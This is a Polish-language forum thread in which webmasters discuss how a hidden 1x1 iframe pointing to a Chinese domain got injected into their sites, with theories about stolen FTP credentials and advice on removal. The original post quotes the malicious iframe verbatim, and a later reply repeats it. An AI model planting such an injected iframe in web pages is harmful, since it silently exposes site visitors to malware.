Wirus dolepił IFRAME'a

[Winston]

Do jednej z moich stron jakieś paskudztwo dokleiło IFRAME (najpewniej ze szkodliwym kodem):

<iframe src="https://mixante.cn/in.cgi?income55" width=1 height=1 style="visibility: hidden"></iframe>

Zorientowałem się jak po dodaniu strony do jednego z katalogów dostałem info o usunięciu z powodu wykrycia wirusa. Pytanie - jak to paskudztwo przylazło? Używam Total Commandera (z zapamiętanymi hasłami, tak - wiem, wiem), ale ogólnie dbam o czystość maszyny, którą używam. Poza tym sprawdziłem pozostałe strony, do których mam zapisane hasła i są czyste. Ta strona akurat za to jako jedyna stoi na serwerze w STREFA.pl.

Wie ktoś w jaki sposób to świństwo się rozprzestrzenia?

Aha, strona ta nie jest na żadnym CMSie, tylko używa prostego, autorskiego skryptu PHP.

[Szakal]

Total Commander gdzieś był dłuuugi temat o tym nie jesteś jedyny

[Kukiel]

Zdaje sie, ze tc nie szyfruje hasel takze ja bym obstawial ten wariant. Kiedys mialem to samo, uzywalem tc i dostalem iframe'a na kazda podstrone i potem trzeba bylo sie gramolic z wszystkimi.

Pozdrawiam.

[kilas88]

dlatego używać FlashFXP, zdecydowanie lepszy

[shpyo]

https://blog.shpyo.net/?newsID=153 - wszystko o tym "zakażeniu" ;D

[koval]

Ja z kolei radzę rozwagę przy wklejaniu "strumienia" lub innych treści z Dailymotion.

Dokleja kod podejrzany na końcu strony.

[maciejcz]

Jeśli strona jest postawiona np. na home.pl albo stworzyłeś na FTP-ie folder TMP, możliwe, że znajdziesz odpowiedź tutaj. Niektórym z szukających na pewno pomoże, innym życzę powodzenia.

Do jednej z moich stron jakieś paskudztwo dokleiło IFRAME (najpewniej ze szkodliwym kodem):

<iframe src="https://mixante.cn/in.cgi?income55" width=1 height=1 style="visibility: hidden"></iframe>

Zorientowałem się jak po dodaniu strony do jednego z katalogów dostałem info o usunięciu z powodu wykrycia wirusa. Pytanie - jak to paskudztwo przylazło? Używam Total Commandera (z zapamiętanymi hasłami, tak - wiem, wiem), ale ogólnie dbam o czystość maszyny, którą używam. Poza tym sprawdziłem pozostałe strony, do których mam zapisane hasła i są czyste. Ta strona akurat za to jako jedyna stoi na serwerze w STREFA.pl.

Wie ktoś w jaki sposób to świństwo się rozprzestrzenia?

Aha, strona ta nie jest na żadnym CMSie, tylko używa prostego, autorskiego skryptu PHP.

[Shadowsword]

Wczoraj miałem podobny atak. Firma hostingowa powiedziała, że atak mógł być wykonany metodą brute force i zalecają użycie dłuższego i bardziej skomplikowanego hasła

[Andrzej Groboś]

też miałem taki atak. Masakra, cały FTP, kilkadziesiąt folderów i podfolderów - pliki index.php index.htm login.php itp. usuwanie tego jest męczące. Przydał by sie skrypt PHP, który usuwa ten kod z FTPa całego

[relons]

Nie użwajcie Total Commandera do przesyłania danych przez FTP! Ściągnijcie Filezilla FTP Client lub inny program.

[EliaSh]

Nie użwajcie Total Commandera do przesyłania danych przez FTP! Ściągnijcie Filezilla FTP Client lub inny program.

Ja używałem GlobalScope i niestety też mnie to zaatakowało, więc nie tylko TC... przeskanuj dobrze komputer antywirusem i antyspywarem

[djurek]

Mi prze to gów.... strona z serpów wypadła

[secesjonista]

Ja też to miałem. Totalna porażka. cała noc z tym badziewiem walczyłem

[stat4seo]

Jak wygląda ten syf co się dolepia ? Napisze skrypt do kasowania tego g. ale musze wiedzieć jakie przyjmuje postacie... skrypt może wywalać po prostu wszystkie iframe, lub ramki z "width=1 height=1", ale nie wiem czy zawsze dolepia się taki kod.

[hosti]

Jak wygląda ten syf co się dolepia ? Napisze skrypt do kasowania tego g. ale musze wiedzieć jakie przyjmuje postacie... skrypt może wywalać po prostu wszystkie iframe, lub ramki z "width=1 height=1", ale nie wiem czy zawsze dolepia się taki kod.

skryptem raczej nie pójdzie...

miałem tan atak w piątek i oprócz doklejania ifarme skasowało mi kilka ostatnich linijek PHP'a